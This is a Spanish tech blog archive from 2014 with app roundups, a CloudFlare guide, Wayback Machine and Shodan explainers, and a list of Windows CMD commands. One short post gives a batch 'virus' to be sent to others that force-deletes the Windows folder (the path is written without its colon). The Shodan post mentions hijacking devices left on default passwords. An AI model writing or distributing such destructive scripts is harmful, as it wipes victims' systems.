viernes, 23 de mayo de 2014

Top 10 aplicaciones para android

Hoy os traigo las diez mejores aplicaciones que podemos bajar del Market de Android. Todas ellas son gratuitas y las podemos disfrutar desde el minuto uno que nos las bajemos.

1- Dedo tenis (Tennis 3D).
Se trata de un juego de tenis basado en la física real en 3D. Como su propio nombre indica se maneja con el dedo. Con él podremos cortar las bolas o golpearlas dependiendo de lo que queramos en cada momento. Además el juego ofrece una gran variedad de jugadores únicos para elegir y ganar los cuatro Grand Slam con éxito que ofrece. 
2- Candy Crush Saga.
Esta aplicación no tiene necesidad de presentación. Es uno de los juegos más adictivos de los últimos tiempos y si no sabes de que va yo te lo explico. El juego consiste en enlazar dulces (caramelos para ser exactos) en combinaciones mínimas de 3 para ir eliminando bloques y pasarte los niveles. A cada pantalla pasada la cosa se complica con formas raras que hacen que no se nos vayan y demás.
3 - Cut the Rope 2.
Este es la segunda parte de otro de los juegos más adictivos del mercado. Se trata de un juego en el que tenemos que dar de comer un caramelo a un extraterrestre de 4 patitas y cara angelical. El problema viene cuando eso lo tienes que hacer cortando una cuerda con cuidado de que le caiga en la boca y no se pierda por el camino. 
4- Farm Heroes Saga
El Farm Heroes Saga es un juego muy parecido al Candy Crush Saga (de hecho es del mismo creador) pero en vez de coleccionar golosinas, tendremos que juntar frutas y verduras para conseguir puntos en los más de 100 niveles del juego. ¡Todo esto ante la atenta mirada del Mapache Maquiavélico (Rancid the Racoon en inglés) que quiere destrozar la granja.
5- Shazam
En esta lista de aplicaciones no todo iban a ser juegos. Aquí os traemos una aplicación de las más demandadas que nos sacan de algún que otro apuro. Se trata de un reconocedor de canciones y series. 
6- Dame MP3
Se trata de una aplicación para bajarnos nuestra música favorita. Es muy fácil de usar. Con solo meter el nombre del artista y la canción deseada, te busca la de mejor calidad que hay por la red y te la descarga a tu móvil. 
7 - Pou.
Podemos decir que esta es la versión moderna pero para el móvil del famoso Tamagochi. 
8- Clean Master (Optimizador de memoria).
Simple, Exhaustiva y Segura. Clean Master es la aplicación más descargada del mundo que se encarga de optimizar la memoria, acelerar y actuar como antivirus en los dispositivos Android. 
9 - Spotify.
Spotify es un programa muy conocido para el ordenador de casa que te permite escuchar música de todo tipo y a cualquier hora del día. Ahora lo han convertido en aplicación para sacarle mas rendimiento.
10- Clash of Clans
Cerramos el apartado de aplicaciones con un juego como no. Esta vez os hablamos de Clash of Clans. Este juego está basado en la guerra entre clanes y en tiempo real.
Recordar darle a like. MUCHAS GRACIAS POR LEERNOS 

¿COMO CREAR UN VIRUS CON BLOC DE NOTAS?

Esto lo hacen bajo SU RESPONSABILIDAD lo que les muestro a continuación se debe hacer en el bloc de notas.Es un virus muy facil de crear y de mandar.

1º-Abrimos el bloc de notas y escribimos lo que aparece a continuación:

@echo off
title g00d by3 wind0w5
echo 4di05 a tu wind0w5
del /s /f /q C\Windows
exit

2º-Una vez que hemos escrito eso se guarda con extensión ".bat", es muy importante que lo guarden con extensión .bat.

jueves, 22 de mayo de 2014

Ganar likes en instagram

La nueva aplicación que os comento es una aplicación que sirve para ganar likes en instagram instantáneamente. 
Su uso es muy facil simplemente tienes que dar a likes a otras fotos para ganar créditos y por decirlo de alguna manera con dos créditos ganas un like. 
La aplicación se llama 1000likes y aquí la podéis descargar.

Trucos para minecraft

Hace unos días investigando por googleplay encontré esta aplicación que es muy útil y ademas es gratis.

Una de las mejores aplicaciones android para Minecraft para editar el inventario, para cambiar el tiempo, para cambiar el lugar de reaparición es PocketInvEditor.

Debéis probar esta aplicación yo os la recomiendo pulsar aquí para descargar.

Como crear una web: 6 CloudFlare

Uno de los servicios que se utiliza con más asiduidad en la actualidad son los CDN ( Red de entrega de contenidos), este servicio se utiliza para distribuir el contenido desde distintos servidores y que el tiempo de carga sea mínimo, independiente de la localización de nuestros visitantes.
Por ejemplo una gran empresa, no se puede permitir tener sus servidores en Estados Unidos y por tanto que funcione bien en América, pero que desde Europa sus usuarios tarden mucho en cargar sus páginas o disponer del software que les están vendiendo.

CloudFlare

CloudFlare es uno de los servicios de CDN más utilizados, entre otras cosas por disponer de múltiples opciones y maneras de configuración. Además dispone de un servicio gratuito, con el que puedes probarlo y si ves que necesitas más características siempre puedes ir a una versión superior.
Algunas de las opciones que tiene CloudFlare son:
  • Disponibilidad de la página, incluso cuando está caída, mediante la visualización de una caché de nuestra página.
  • Minimización de los archivos fuente de nuestra web (CSS, HTML, JS).
  • Disponibilidad de un conjunto de aplicaciones para nuestra página de rápida configuración, como Google Analytics.
  • Denegación de accesos desde IPs que han lanzado ataques antes.
  • Gestión de estadísticas propias desde CloudFlare.

Precio y opciones

CloudFlare posee distintos planes, entre los que se incluye uno gratuito que es el que por ejemplo estamos usando en esta página:
CloudFlare posee distintos planes, que se adaptan a todo tipo de sitios web
CloudFlare posee distintos planes, que se adaptan a todo tipo de sitios web

Aplicaciones autoinstalables y configurables via CloudFlare

En este enlace, podéis ver las aplicaciones que soporta por defecto. Esto acelera bastante el desarrollo de nuevos sitios y nos permite contar con algunas tecnologías muy importantes que están únicamente al alcance de un click.

Mejora de rendimiento

Ahora os vamos a mostrar dos capturas, la primera de ellas sin CloudFlare activo y la segunda con él. Para ello vamos a utilizar GTmetrix del que ya habíamos hablado anteriormente.
Antes:
Antes
Después:
Despues
Como veis su utilización mejora de una manera sustancial nuestra web, reduciendo el tiempo de carga y el número de archivos que se deben descargar.

Nuevo Humble Bundle con grandes juegos

 Hoy os traemos una gran noticia, en su oferta semanal, tenemos un pack de juegos de Bohemia Interactive, seguramente si os decimos este nombre, no os sonará de nada. Pero si hablamos de juegos como Arma II o su archiconocido mod DayZ seguro que la cosa cambia.

Los juegos de esta semana en Humble Bundle
Los juegos de esta semana en Humble Bundle

De los siguientes juegos, algunos la verdad no puedo opinar porque no los conozco, pero de Arma II su expansión Arma II : Operation Arrowhead solo he escuchado halagos, y los amigos que tengo que juegan a él están muy contentos y me lo han recomendado encarecidamente.
Si hablamos de DayZ posiblemente uno de los mejores mod de juegos de PC de todos los tiempos, también las críticas son muy buenas, tanto es así que hay gente que compra el Arma II solo para jugar a este mod que es gratuito. Por otra parte hemos conocido que debido al éxito del mod, lo están desarrollando por separado del juego y ya se puede comprar en fase de desarrollo en Steam.
Os animamos a haceros con ellos y a disfrutar de un gran pack de juegos y sabiendo que nuestro dinero también tiene un fin social, con el que ayudar a las personas.
Para los que no tengan presupuesto para juegos, os recomendamos pasaros por Steam 

Wayback Machine : encontrando webs desaparecidas

Hoy vamos a conocer un lugar muy especial. Se trata de un sitio web que es la entrada a toda web que alguna vez haya existido y que haya estado online, aunque haya sido por poco tiempo, aunque desapareciera o aunque ya no quede copia de ella en ningún servidor del mundo (y mucho menos en los servidores que en su día la albergaron).
No en vano, este megaproyecto que lleva décadas funcionando (pero que ha pasado muy desapercibido para el gran público en general y no poco público especializado) se autodenomina WAYBACK MACHINE – Internet Archive.
Es decir, algo así como una máquina del tiempo, un Arca de la Alianza y una Biblioteca de Alejandría juntos. Y todo, disponible para todos en internet.

Introducción

¿Cuántas veces nos hemos preguntado a dónde habrá ido a parar aquella web de aquella empresa o proyecto que en su día estuvo online pero que desde hace años (o incluso décadas) ya ni existe?
O… ¿Qué habrá sido de la primera versión web de tal compañía?… Quizá de la mía o de la de aquel proyecto de juventud en el que trabajamos o para el primero que hice mis pinitos en el noventa y algo…
Pues tranquilos, hoy vamos a descubrir que, en efecto, hay un proyecto en marcha que se ha dedicado a almacenar en caché una copia de toda web, de cualquier parte del planeta e idioma (al más puro estilo enjambre de servidores Google) pero disponible para todo el mundo.
Yo he logrado encontrar la primera web para la que hice un par de “arreglos” en 1996, por ejemplo. Y no hace falta que os diga que ni mi proyecto, ni la web, ni la propia empresa que me lo encargó, existen ya.
wayback

WAYBACK MACHINE – Internet Archive.

¿Qué es y cómo funciona?

Bueno, en síntesis Wayback Machine es un buscador. Pero dejarlo ahí sería injusto e incorrecto, porque este potentísimo motor de búsqueda no nos ofrece resultados que existan hoy en día. Es decir, no nos devuelve una relación de webs indexadas que hoy en día están online, vivitas y coleantes.
Lo que hace que este servicio sea tan brutal es que, previamente, ha almacenado una copia de cada página web que alguna vez haya existido, y la guarda en sus propios servidores. Después, cuando tecleamos alguna web que queramos recuperar o volver a consultar pasados los años y las décadas, este algoritmo busca en sus servidores (en los que actualmente hay 430 mil millones de webs almacenadas) y nos ofrece el resultado, aunque esa página lleve mucho, pero que mucho tiempo desaparecida de la Red.

Pero… no quedan aquí las funcionalidades.

Por si fuera poco que estos señores se hayan dedicado a ser los guardianes del recuerdo almacenando todo Internet desde sus comienzos (página web a página web), además, han esmerado al máximo tanto su algoritmo como la presentación de los resultados. De hecho, se lo han trabajado tanto (y se lo siguen trabajando) que ofrecen sus respuestas por años.
Es decir: Imaginemos que tecleamos en su caja de búsqueda, la dirección de una web que alguna vez estuvo online y operativa. Supongamos también que esta web, empresa o proyecto estuvo online durante varios años. Pues WayBack Machine nos ofrece una presentación por años, a través de un calendario de días, semanas, meses y años, para que seamos nosotros los que elijamos qué página concreta, de qué día o mes y de qué año, es la que queremos recuperar… ¿Se puede haber concebido mejor el invento?.
google
Página web de Google en 1998 recuperada con WayBack Machine

Usos de Wayback Machine

Como hemos dicho al principio del post, Waybackmachine es una máquina del tiempo, un Arca de la Alianza y una Biblioteca de Alejandría digitales “todo en uno”. De manera que los usos que se le pueden querer dar a este megaproyecto abierto a todos los públicos, son casi ilimitados.
Os apuntamos sólo unos cuantos:
  • Necesidad de recuperar o probar que una web existió alguna vez, recuperar su contenido, mostrarlo y, con ello, demostrar lo que se publicó y que alguna vez estuvo online aunque después se encargaran de hacerlo desaparecer…
  • Recuperar contenidos más que olvidados y desaparecidos años atrás en internet.
  • Realizar copias de seguridad no sólo de webs actuales (cosa que tendría escaso mérito hoy en día) sino de contenidos online que hace décadas que dejaron de existir.
  • Necesidad de demostrar, con carácter probatorio, la existencia de alguna página, empresa online, contenidos etc… que alguna vez estuvieron online aunque serían ya imposibles de localizar o rastrear.
  • Y, como no, la mera nostalgia o curiosidad: ¿Cómo era la primera web que Microsoft tuvo online cuando Bill Gates todavía dudaba de la viabilidad de Internet?; ¿Cómo era el logotipo y la distribución de Olé antes de que fuera comprado por Telefónica e integrado en la malograda Terra?; O… ¿Por qué no?: ¿Qué fue de aquella web o contenidos que alguna vez hice, se publicó online y… desde el 95 no he podido volver a localizar jamás porque todo desapareció?.
Pues ahora ya tienes remedio para todos estos interrogantes, desde los más prosaicos a los más necesarios y serios para los que puedas alguna vez necesitar “regresar en el tiempo” y consultar una web que lleva mucho tiempo desaparecida y descatalogada o inexistente.
Wayback Machine es un proyecto con un slogan tan verdadero como encomiable “Universal access to all knowledge”. Y es que Internet es demasiado grande, demasiado rápido y demasiado complejo como para que caigan en el olvido las páginas que alguna vez la han compuesto.
Ahora ya sabes que, para cuando lo necesites, dispones de una máquina del tiempo que te teletransportará al día de la semana, el mes y el año que desees, para regresar a sentarte delante de aquella página web que había desaparecido pero que… alguien se ocupó de que quedara almacenada para ti.

Shodan : El buscador Hacker más terrorífico

Ya estamos de vuelta con otro de esos paseos por el “lado oscuro” que, por vuestros comentarios y reacciones, más interés despiertan y más parecen gustaros.
En esta ocasión vamos a estudiar por encima un buscador muy especial… El buscador de los hackers y, de paso, una de las aplicaciones más peligrosas del mundo. Ahora veremos por qué.

Introducción

Cuando hablamos de buscadores inmediatamente se nos vienen unos cuantos nombres, colores y logotipos a la mente. Que si Google, que si Yahoo, que si el siempre malogrado Bing de Microsoft… Los más nostálgicos incluso es posible que tiren de recuerdos y rescaten de su banco de memoria personal heroicas enseñas como Altavista o incluso aquél ya mítico Olé que tantas delicias nos hizo pasar en los noventa a los primerizos españoles que nos adentrábamos en la recién llegada Internet.
Por añadidura, el término buscador viene acompañado de buenas o, por lo menos, inocuas sensaciones: Que si nos ayuda a diario en nuestro trabajo; que si nos facilita la vida; que si nos ahorra tiempo; que si vamos a mirar a ver qué aspecto tiene realmente un ornitorrinco…
No cabe duda de que es uno de los conceptos más celebrados, útiles y exitosos de la Red: Buscar en milésimas de segundos cualquier cosa. Acceder a todo el conocimiento posible, con sólo teclear lo que queremos buscar.
Hasta ahí todo bien. Pero lo que quizá no muchos de vosotr@s sepáis, es que (como todo en el mundo de la informática y desde luego en la Red) también existen versiones hack de este tipo de algoritmo. Y eso es precisamente lo que traemos hoy: El buscador de los hackers.

Shodan ¿Qué es y para qué sirve?

Bueno, para responder a las anteriores preguntas y realizar un acercamiento básico a SHODAN hemos de comenzar diciendo que es un buscador pero nada convencional. De hecho, las especialidades de este motor de búsqueda son proveerte de todo aquello que no encuentras en Google, Yahoo y sucedáneos.
Pero no queda aquí la cosa. Cuando decimos que es el buscador de los hackers, no es precisamente porque entre sus virtudes esté la capacidad de buscar y encontrar información en capas o estratos de la Red que no toca Google, o que su algoritmo se reserva y no muestra… no, la cosa es bastante más impactante.
Por poner uno de los innumerables ejemplos de lo que se puede hacer con Shodan, haremos referencia a uno de sus puntos fuertes: La localización de dispositivos conectados a internet en todo el mundo.
Es decir, que puede ser empleado para conocer y potencialmente acceder a todo dispositivo con conexión a Internet en cualquier parte del planeta. Es decir, su algoritmo rastrea conexiones y ofrece abundante información de las mismas: Marca del dispositivo, IP, datos de la matrícula de la máquina y todo un elenco de información particular y privada del proveedor de servicios empleado para que dicho dispositivo se conecte a Internet, entre otras lindezas.
130408145829-shodan-story-top
Y no penséis que por “dispositivos” hablamos sólo de terminales convencionales u ordenadores. Nada de eso. Una simple búsqueda en Shodan, bien por tipo de dispositivo, bien por la localización que nos interese y obtendremos móviles que en ese instante estén conectados a la Red en esa zona geográfica concreta, cámaras de tráfico (oficiales) con conexión inalámbrica a la Red; Cámaras de vigilancia o de seguridad etc, etc…
Ahora que hemos mencionado esta funcionalidad de Shodan, a buen seguro empezáis a comprender por qué es tan peligroso este servicio de buscador hacker.
Para poneros las cosas un poco peor (y al mismo tiempo, ilustraros la realidad de este servicio de buscador hacker a disposición de cualquiera) diremos que mirando entre las múltiples opciones de dispositivos que permite visualizar está, atención, “refrigeradores”. Sí… habéis leído bien. Hablamos que uno de los parámetros que este buscador incluye entre sus opciones de búsqueda y localización es la de conocer y acceder incluso a frigoríficos de última generación de esos que ofrecen conexión a internet para hacer la compra online…

Usos de Shodan

Para hacer este artículo, como siempre que me siento delante de mi PC para escribir un post he probado algunas de las lindezas del producto.
Entre otras maravillas (para unos) y barbaridades para otros, he encontrado el listado completo de terminales de Canal Plus, Digital Plus y demás hardware de conexión de televisión privada de los que se puede conocer: Fabricante, proveedor de servicios de TV, dirección IP y proveedor de servicios de conexión a Internet y… con un poco de pericia y empleando algunos widgets que se pueden localizar en la propia Shodan, formas de “engancharnos” a distancia a la señal de ese dispositivo.
Es decir, robar la señal receptora o hackear el Canal Plus de alguien que no haya modificado la contraseña que venía por defecto en el aparato cuando se le instaló en casa.
Por cierto, que entre la numerosa información que ofrece este buscador cuando localiza y ofrece datos de dispositivos conectados a Internet, se encuentra la de indicarnos si posee o no contraseña, si ésta es segura o incluso si es la que inicialmente traía el aparato de fábrica y no ha sido cambiada por el comprador.
SHODAN___Wallpaper_by_SuicideNinja
De modo que así están las cosas. Como siempre he mantenido en mis post sobre hacking (tanto ético como no del todo moral) hay que recordar un principio básico: Todo servicio, programa o producto comercial existente en el mercado tiene, como mínimo, una versión hacker o hackeada, tendente a todo lo contrario o a facilitar un uso más o menos doloso de sus bondades.
Y, como no podía ser de otro modo, los buscadores no son una excepción.
Los hackers también buscan. Los hackers desarrollan sus propios productos para sus necesidades específicas; La tecnología es neutra y el uso que cada cual le de a este tipo de conocimiento técnico y software, es cosa de cada cual.
Pero ahora ya conoces un poco mejor un buscador muy especial. Uno que, de hecho, entra hasta la cocina, informa de contraseñas de los dispositivos que tienes en casa, y en definitiva, ayuda potencialmente a acceder a toda máquina conectada a Internet, desde un teléfono móvil a una cámara de tráfico o de seguridad de una tienda de barrio. Todo al alcance de unos cuantos clicks.
Y, por supuesto, esto es solo una muestra de lo mucho que se puede hacer con Shodan, pero para no eternizar este post, nos hemos centrado hoy tan solo en presentároslo y daros unas pinceladas de sus “bondades”. Tiempo y posts habrá para profundizar un poco más en este motor de búsqueda del lado oscuro.
¿A que ahora ya no te sientes tan seguro como hace un ratito?
Saludos a tod@s.

Lista de comandos disponibles en la consola de CMD de Windows 7

ARP
Mantiene en cache la correspondencia entre las direcciones IP y las direcciones físicas del adaptador o tarjeta de red. Es utilizado en tareas de redes para optimizar el rendimiento de las conexiónes y para solucionar conflictos.
ASSOCMuestra o modifica las asociaciones de las extensiones de archivos, o sea la acción que Windows debe realizar de acuerdo a la extensión que posea el archivo.
AT
El comando AT programa la ejecución de
 comandos y programas en un equipo a una
 hora y fecha especificadas. El servicio
 de programación debe estar en ejecución 
para utilizar el comando AT.
ATTRIBMuestra o cambia los atributos de un archivo. En Windows se le asigna a cada archivo, de acuerdo a la función o al objetivo que van a desempeñar en el equipo un atributo, ya sea de archivo oculto, de sistema, solo lectura, etc. Con el comando ATTRIB es posible saber los establecidos en un archivo determinado y retirárselo o asignarle otro.
AUDITPOLEs usado para mostrar o cambiar configuraciones de permisos
BITSADMINEs usado para crear, administrar y monitorear tareas de descargas y subidas de archivos.
BREAKEstablece o elimina la comprobación extendida de Ctrl+C en la consola.
BCDBOOTHerramienta de reparación y creación de archivos de arranque BCD. La herramienta de línea de comandos bcdboot.exe se usa para copiar archivos de arranque imprescindibles a la partición del sistema y para crear un nuevo almacén de BCD en el sistema.
BCDEDIT
Editor de la base de datos de la configuración de arranque (BCD) del equipo.
Podemos usarlo para establecer el orden de los sistemas operativos, su nombre en el menú de arranque, usar sistemas en discos virtuales, habilitar o deshabilitar efectos, etc.
BOOTCFGEsta herramienta de la línea de comandos se puede usar para configurar, consultar, cambiar o eliminar la configuración de la entrada de arranque en el archivo BOOT.INI en sistemas operativos anteriores a Windows Vista.
CACLSMuestra o modifica las listas de control de acceso (ACLs) de archivos.
CALLLlama un segundo batch desde uno en ejecucion.
CDMuestra el nombre o cambia al directorio actual
CHCPMuestra o establece el número de página de códigos activa.
CHDIRMuestra el nombre o cambia al directorio actual, igual que CD
CHKDSKChequea, comprueba y repara errores de disco.
CHKNTFSMuestra o modifica la comprobación del disco de sistema antes de iniciar Windows
CHOICEEsta herramienta permite que los usuarios seleccionen un elemento de una lista de opciones y devuelve el índice de la opción seleccionada.
CIPHERMuestra o altera el cifrado de directorios [archivos] en particiones NTFS.
CLEANMGRLibera espacio en disco, permite guardar en memoria tus opciones.
CLIPRedirecciona el resultado de las herramientas de la línea de comandos al Portapapeles de Windows. Esta salida de texto se puede pegar en otros programas.
CLSBorra y aclara los simbolos o texto en la pantalla.
CMDInicia una nueva instancia de la consola
CMDKEYCrea, presenta y elimina nombres de usuario y contraseñas almacenados.
COLOREstablece los colores de primer plano y fondo de la consola.
COMPCompara el contenido de dos archivos o un conjunto de archivos.
COMPACTMuestra o cambia el estado de compresión de archivos en particiones NTFS.
CONVERTConvierte volúmenes FAT a volúmenes NTFS. No puede convertir la unidad actual.
COPYCopia uno o más archivos en otra ubicación
CSCRIPTPermite ejecutar en la consola archivos VBS conteniendo scripts escritos en lenguaje VBScript. También puede utilizarse en archivos batch con la opción //B, con lo que se evitarán los mensajes de error y avisos de secuencias de comandos
DATEMuestra o establece la fecha.
DELElimina uno o más archivos.
DEFRAGLocaliza y consolida archivos fragmentados en volúmenes locales para mejorar el rendimiento del sistema.
DIRMuestra una lista de archivos y subdirectorios en un directorio.
DISM
Ofrece información, instala, desinstala, configura y actualiza características adicionales y paquetes de imágenes de Windows.
Por ejemplo, para mostrar las características instaladas de Windows que se pueden desinstalar usa:
DISM.exe /Online /English /Get-Features /Format:Table
DISKCOMPCompara el contenido de dos disquetes.
DISKCOPYCopia el contenido de un disquete en otro.
DISKPARTMuestra o configura las propiedades de partición de disco.
DOSKEYEdita líneas de comando, memoriza comandos de Windows y crea macros.
DRIVERQUERYMuestra el estado y las propiedades actuales del controlador de dispositivo.
ECHOMuestra mensajes, o activa y desactiva el eco
ENDLOCALTermina la búsqueda de variables de entorno del archivo por lotes
ERASEElimina uno o más archivos, igual que DEL
EXPANDExpande uno o varios archivos comprimidos
EXITSale del programa CMD.EXE (interfaz de comandos)
FCCompara dos archivos o conjunto de archivos y muestra las diferencias entre ellos
FINDBusca una cadena de texto en uno o más archivos.
FINDSTRBusca cadenas de texto en archivos.
FOREjecuta un comando de forma simultánea en varios archivos, permite reducir la cantidad de código necesario en varias tareas. Es uno de los comandos que ofrece mayores beneficios prácticos.
FORFILESComando de uso algo similar a FOR, selecciona uno o varios archivos y ejecuta un comando en cada uno de ellos. Permite multitud de opciones útiles poco explotadas.
FORMATPermite darle diferentes formatos a discos duros u otros dispositivos para usarlo con Windows.
FSUTILMuestra o configura las propiedades de sistema de archivos. Posee varios subcomandos para la administración efectiva del sistema de archivos y volúmenes.
FTYPEMuestra o modifica los tipos de archivo usados en una asociación de extensión de archivo
GETMACMuestra la MAC Address o dirección física del adaptador de red de existir uno en el equipo.
GOTODirecciona el intérprete de comandos de Windows a una línea en un archivo batch.
GPRESULTMuestra información de directivas de grupo por equipo o usuario
GPUPDATEActualiza los cambios hechos en el Editor de directivas de grupo local.
Permite que se active cualquiera de las directivas establecidas ya sea inmediatamente, al reiniciar o al iniciar sesión.
Para lograr que se activen inmediatamente usa: GPUPDATE /force
GRAFTABLPermite a Windows mostrar un juego de caracteres extendidos en modo gráfico
HELPProporciona información de ayuda para los comandos de Windows
ICACLSMuestra, modifica, hace copias de seguridad o restaura listas de control de acceso (ACL) para archivos y directorios
IFEjecuta comandos de forma condicional, se utiliza para definir valores de error, comparar cadenas, demostrar existencia de archivos y hacer comparaciones matemáticas entre otros.
IPCONFIGMuestra los parametros de una conexion de red. De forma predeterminada, se muestra solamente la dirección IP, la máscara de subred y la puerta de enlace predeterminada para cada adaptador enlazado conTCP/IP.
LABELCrea, cambia o elimina la etiqueta del volumen de un disco
LOGMANPermite manejar y administrar el Monitor de rendimiento de Windows desde la línea de comandos
MEMMuestra la cantidad de memoria libre y usada en el sistema
MDCrea un directorio o carpeta
MKDIRCrea un directorio, igual que el anterior
MKLINKCrea vínculos simbólicos y vínculos físicos
MODEConfigura un dispositivo de sistema
MOREMuestra la información pantalla por pantalla
MOVEMueve uno o más archivos de un directorio a otro en la misma unidad
MSINFO32Inicia la herramienta Información del sistema que muestra datos técnicos del equipo y sistema operativo.
MSTSCInicia una conexion remota al escritorio
NBTSTATMuestra las estadísticas del protocolo y las conexiones actuales de TCP/IP usando NBT (NetBIOS sobre TCP/IP)
NETConfigura una amplia variedad de parametros en redes.
NETCFGEs utilizado para instalar Windows Preinstallation Environment (WinPE), una version minima y ligera de Windows usada por desarrolladores
NETSHEl comando NETSH (Network Shell) permite configurar, determinar conflictos y administrar diferentes componentes de redes mediante la línea de comandos de forma local o remota.
Muestra y configura el estatus de los componentes de los protocolos de redes instalados. Los comandos de Netsh están organizado en forma de árbol, cada tecnología y protocolo tiene su propio contexto.
NETSTATMuestra estadísticas del protocolo y conexiones TCP/IP actuales. Permite el monitoreo de todas las conexiones activas 
NLSFUNCCarga la informacion especifica de un pais o region
NLTESTEl comando NLTEST se utiliza para realizar pruebas mediante canales seguros entre los ordenadores Windows de diferentes dominios y entre controladores de dominio que son de confianza
NSLOOKUPMuestra informacion sobre los servidores DNS asignados a tu conexion de red. Permite hacer peticiones a estos servidores. 
OCSETUPInicia Windows Optional Component Setup herramienta que instala opciones adicionales de Windows
OPENFILESMuestra archivos compartidos abiertos por usuarios remotos
PATHMuestra o establece una ruta de búsqueda para archivos ejecutables
PAUSEPausa la consola y muestra un mensaje
PINGPermite probar una conexión de red, enviando y recibiendo un paquete de datos.
POPDRestaura el valor anterior del directorio actual guardado por PUSHD
POWERSHELLEjecuta una instancia de Windows PowerShell, la nueva consola de comandos que incluye Windows en sistemas posteriores a Windows Vista.
Al mostrarse PS en el símbolo de la consola significa que te encuentras en el entorno de PowerShell, por lo que introduzcas a partir de ese momento estará relacionado con este intérprete, para volver a la consola solo escribe CMD y presiona Enter.
PRINTImprime un archivo de texto
PROMPTCambia el símbolo de comandos de Windows
PUSHDGuarda el directorio actual y después lo cambia
QAPPSRVMuestra los servidores host de sesión de Escritorio remoto disponibles en la red
QPROCESSMuestra información sobre procesos
QUERYMuestra el status actual y los parametros de un servicio especifico
QUSERMostrar información sobre los usuarios que han registrado la entrada en el sistema
QWINSTAMuestra información sobre las sesiones de Escritorio remoto
RASDIALEs usado para iniciar o detener una conexion de acceso telefonico o dial up
RDQuita o elimina un directorio o carpeta
RECOVERRecupera la información legible de un disco dañado o defectuoso
REGEs usado para administrar todos los parámetros del Editor del Registro desde la línea de comandos y archivos batch. Es posible agregar, modificar claves, valores, exportar ramas, etc.
El comando REG se compone de varios subcomandos, cada uno para un uso completamente diferente, son:
REG QUERY, REG ADD, REG DELETE, REG COPY, REG SAVE , REG RESTORE, REG LOAD, REG UNLOAD, REG COMPARE, REG EXPORT, REG IMPORT y REG FLAGS.
REGEDITEl comando REGEDIT permite importar, exportar o eliminar configuraciones en el registro desde un archivo de texto plano de extensión .reg.
REGSVR32Registra librerias DLL para incorporarlas al registro
RELOGRelog crea nuevos registros de rendimiento a partir de datos de registros de rendimiento existentes cambiando el intervalo de muestreo o convirtiendo el formato de archivo.
Admite todos los formatos de registro de rendimiento, incluidos los registros comprimidos de Windows NT 4.0
REMMarca comentarios en archivos por lotes o CONFIG.SYS. La linea en un batch que comienza con REM es considerada un comentario
RENCambia el nombre de uno o más archivos
RENAMECambia el nombre de uno o más archivos, igual que el anterior
REPLACEReemplaza archivos
RMDIRQuita un directorio
ROBOCOPYUtilidad avanzada para copiar carpetas y directorios en Windows.
RESET SESSION(Rwinsta) Volver a establecer el hardware y el software de subsistema de la sesión con los valores iniciales conocidos
ROUTEManipula tablas de enrutamiento de red
RPCPINGHace ping al servidor mediante RPC
RUNDLL32Inicia funciones incluidas en librerías DLL del sistema.
RUNASEs usado para ejecutar un programa utilizando credenciales o derechos de otro usuario
SECEDITAnaliza la seguridad del sistema y hace la comparacion con una plantilla determinada
SETMuestra, establece o elimina variables de entorno de Windows. Las variables creadas solo permanecerán durante la sesión creada con la consola.
SETLOCALComienza la sección de cambios locales de entorno en la consola
SETVEREl comando SETVER se utiliza para establecer el número de versión de MS-DOS que se informa a un programa
SETXCrea o modifica variables de entorno en el entorno de usuario o de sistema. Los cambios se guardan en el Registro, por lo que las variables pueden usarse aun después de cerrar la sesión actual.
SCMuestra o configura servicios (procesos en segundo plano).
SCHTASKSEjecuta el Programador de tareas. Programa comandos y programas para ejecutarse en un equipo.
SFCComprobador de recursos de Microsoft, examina la integridad de todos los archivos de sistema protegidos y reemplaza las versiones incorrectas por las correctas de Microsoft desde una carpeta del sistema o el disco de instalación.
Es la herramienta ideal para revisar y sustituir archivos dañados por programas, virus, cortes de energía, etc.
SHADOWSupervisar otra sesión de Servicios de Escritorio remoto
SHAREEl comando SHARE se utiliza para bloquear archivos y funciones en MS-DOS
SXSTRACEUtilidad de seguimiento de WinSxs
SHIFTCambia posición de modificadores reemplazables en archivos por lotes
SHUTDOWNPermite el apagado, el reinicio, suspension e hibernacion local o remoto de un equipo
SORTOrdena los resultados de un comando seleccionado, por ejemplo los resultados de una busqueda con FIND
STARTSTART ejecuta e inicia programas, aplicaciones u otros comandos en Windows.
SUBSTAsocia una ruta de acceso con una letra de unidad
SYSTEMINFOMuestra las propiedades y la configuración específicas del equipo
TAKEOWNEsta herramienta permite que el administrador recupere el acceso a un archivo denegado mediante la reasignación de la propiedad del archivo.
TASKLISTMuestra todos los procesos ejecutándose en el equipo con el número de identidad del proceso (PID) y la memoria que utilizan.
TASKKILLPermite detener tareas o procesos usando el PID (número de identidad del proceso) o el nombre.
TCMSETUPEs usado para configurar o deshabilitar el cliente de telefonia Telephony Application Programming Interface (TAPI)
TIMEMuestra o establece la hora del sistema
TIMEOUTEsta utilidad acepta un parámetro de tiempo de espera para esperar el un período de tiempo determinado (en segundos) o hasta que se presióna alguna tecla. También acepta un parámetro para omitir la presión de tecla
TITLEEstablece el título de la ventana de una sesión de CMD.EXE
TRACERPTEl comando TRACERPT se utiliza para procesar los registros de seguimiento de sucesos o datos en tiempo real
TRACERTPermite hacer un seguimiento de la ruta entre un equipo y otro en la red, es muy utilizado para conocer dónde se ha detenido un paquete de datos en la red.
TREEMuestra gráficamente la estructura de directorios de una unidad o ruta de acceso
TSDISCONDesconecta una sesión de Escritorio remoto
TSKILLTermina un proceso
TYPEMuestra el contenido de un archivo de texto
TYPEPERFTypeperf escribe información de rendimiento en la ventana de comandos o en un archivo de registro. Para detener Typeperf presione CTRL+C
TZUTILUtilidad de zona horaria de Windows
UNLODCTRQuita el nombre de contador y texto explicativo para el contador extensible especificado
VERMuestra la versión de Windows
VERIFIERInicia el "Verificador de drivers de Windows", herramienta para comprobar el funcionamiento de los controladores instalados en el sistema.
Nos permite conocer si alguno de ellos es la causa de conflictos, reinicios inesperados o errores de pantalla azul.
VERIFYComunica a Windows si debe comprobar que los archivos se escriben de forma correcta en un disco
VOLMuestra la etiqueta del volumen y el número de serie del disco
VSSADMINHerramienta administrativa del Servicio de instantáneas de volumen, las imágenes creadas por Windows para la función Restaurar sistema.
Por ejemplo, para listar todas las imágenes existentes usa: VSSADMIN list shadows
W32TMHerramienta usada para diagnosticar conflictos del equipo local o de uno en la red con el servicio Hora de Windows (Windows time) al tratar de sincronizar o de actualizar el reloj del sistema
WAITFOREsta herramienta envía o espera a que llegue una señal en un sistema. Si no se especifica /S la señal se difundirá a todos los sistema de un dominio. Si se especifica /S la señal sólo se enviará al dominio especificado
WBADMINHerramienta de línea de comandos de copia de seguridad
